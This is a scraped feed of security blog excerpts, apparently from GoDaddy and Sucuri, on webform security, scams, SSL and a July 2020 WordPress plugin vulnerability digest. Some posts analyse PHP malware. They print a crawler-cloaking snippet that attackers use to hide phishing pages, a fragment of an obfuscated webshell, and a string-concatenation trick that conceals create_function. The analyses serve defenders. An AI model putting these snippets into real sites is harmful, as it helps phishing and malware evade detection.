fbpx

Webform security best practices for small businesses

As a small business owner or manager, you are responsible for your customers’ email addresses, phone numbers and billing addresses the second they type the […]

The post Webform security best practices for small businesses appeared first on GoDaddy Blog.

CSAM: A good month to discuss website security with clients

Cybersecurity Awareness Month isn’t a marketing gambit. Now in its 17th year, CSAM is a collab between government agencies and industry leaders, created to raise awareness and provide resources to further a safer internet. People like web designers and developers should look at CSAM as an opportunity to discuss website security with clients.

How to avoid cyberscams during the COVID-19 pandemic

This article originally published on GoDaddy’s OpenWeStand.org website. The COVID-19 pandemic closed thousands of businesses, left millions without work, and brought about fear and uncertainty […]

The post How to avoid cyberscams during the COVID-19 pandemic appeared first on GoDaddy Blog.

Web Crawler & User Agent Blocking Techniques

Web Crawler & User Agent Blocking Techniques

This is a simple script that allows hackers to block specific crawlers based upon website requests from specific user-agents. This is useful when you don’t want certain traffic from being able to load certain content – usually a phishing page or a malicious download.

if(preg_match(‘/bot|crawler|spider|facebook|alexa|twitter|curl/i’, $_SERVER[‘HTTP_USER_AGENT’])) {
logger(“[BOT] {$_SERVER[‘REQUEST_URI’]} – 500”);

header(‘HTTP/1.1 500 Internal Server Error’);
exit();
}

Using preg_match, the script looks for certain known crawler strings in the user-agent.

Continue reading Web Crawler & User Agent Blocking Techniques at Sucuri Blog.

Smoker Backdoor: Evasion Techniques in Webshell Backdoors

Smoker Backdoor: Evasion Techniques in Webshell Backdoors

“Smoker Backdoor” is a PHP webshell backdoor that uses hexadecimal and decimal obfuscation in conjunction with the PHP function goto to evade detection from malware scanners.

The hexadecimal/decimal obfuscation is clear to see when viewing the file’s PHP code. For instance, this section of the PHP code is obfuscated using this method:

if ($_GET[“x72145156x61155x65”] == “164x72x75x65”) {
    echo “x3c146157162x6dx20145x6e143x74171x7014575x22155165x6c164x69x70141x7216457x66x6f16215555x64141x74141x2240155x65x74x68x6f144x3d42160x6f163x74x2276xax2040” .
        htmlspecialchars($_GET[“x66x69x6c145”])

As with many webshells, it allows the user to set a password to control access to the webshell.

Continue reading Smoker Backdoor: Evasion Techniques in Webshell Backdoors at Sucuri Blog.

How SSL Works with a Website Firewall

How SSL Works with a Website Firewall

It’s no secret that a secure sockets layer (SSL) encrypts data as it moves between a visitor’s browser and the site host. For many people, a single SSL appears to be sufficient for protecting data exchanged between visitors and their website.

But what happens to your SSL protection when you add a web application firewall like the Sucuri WAF? Protecting that additional data transit point is a topic we often discuss with customers, and it’s relevant for anyone to understand.

Continue reading How SSL Works with a Website Firewall at Sucuri Blog.

String Concatenation: Obfuscation Techniques

String Concatenation: Obfuscation Techniques

While string concatenation has many valuable applications in development — such as making code more efficient or functions more effective — it is also a popular way for attackers to obfuscate code and try to make it more difficult to detect. Let’s dig into how bad actors are leveraging this technique to conceal their malware.

Avoiding Detection with String Concatenation

String concatenation obfuscation works by using a period between each string, which instructs PHP to join these character strings  together and run it as a single function — for example, ‘cr’.’ea’.’te’.’_f’.’un’.’c’.’ti’.’o’.’n’; would become create_function.

Continue reading String Concatenation: Obfuscation Techniques at Sucuri Blog.

PHP Binary Downloader

PHP Binary Downloader

When possible, an attacker will want to avoid using specific functions in their PHP code that they know are more likely to be flagged by a scanner. Some examples of suspicious functions commonly detected include system and file_put_contents.

In this malware dropper file we recently found on a compromised website, the attacker chose to create a user-defined PHP function getFile to accomplish the same task as file_put_contents.

Continue reading PHP Binary Downloader at Sucuri Blog.

PHP Backdoor Obfuscated One Liner

PHP Backdoor Obfuscated One Liner

In the past, I have explained how small one line PHP backdoors use obfuscation and strings of code in HTTP requests to pass attacker’s commands to backdoors. Today, I’ll highlight another similar injection example and describe some of the malicious behavior we’ve seen recently on compromised websites.

Obfuscated PHP Backdoor

Discovered by our Remediation team, this PHP backdoor variant uses a method to hide the create_function which requires the attacker to provide it in their request.

Continue reading PHP Backdoor Obfuscated One Liner at Sucuri Blog.

Vulnerabilities Digest: July 2020

Vulnerabilities Digest: July 2020

Relevant Plugins and Vulnerabilities:

Plugin
Vulnerability
Patched Version
Installs

Asset CleanUp: Page Speed
Authenticated XSS
1.4.6.7
80000

Quiz And Survey Master
Authenticated Stored XSS
7.0.0
30000

Comments – wpDiscuz 7.0.0 –
Arbitrary File Upload
7.0.5
70000

Real Estate 7
Reflected XSS
3.0.4
8000

CarePlus
Reflected XSS

5000

WooCommerce Subscriptions
Unauthenticated Stored XSS
2.6.3
10000

Careerfy
Reflected XSS
4.4.0
2300

JobSearch
Reflected XSS
1.5.6
1300

TC Custom JavaScript
Unauthenticated Stored XSS
1.2.2
10000

Email Subscribers & Newsletters
Authenticated SQL injection
4.5.1
100000

WP-Live Chat by 3CX
Authenticated Stored XSS
8.2.0
50000

InJob
Reflected XSS
3.4.1
1880

Travel Booking
Unauthenticated SQL Injection
2.8.4
8000

Travel Booking
Unauthenticated XSS
2.8.4
8000

Monalisa
Reflected XSS
2.1.3
600

Adning Advertising
Arbitrary File Upload
1.5.6
8000

Security & Malware scan
Security Nonce Leak
2.51
5000

Testimonials Widget
Authenticated Stored XSS

30000

Highlights for July 2020:

  • Cross site scripting is still the most common vulnerability in WordPress Plugins.

Continue reading Vulnerabilities Digest: July 2020 at Sucuri Blog.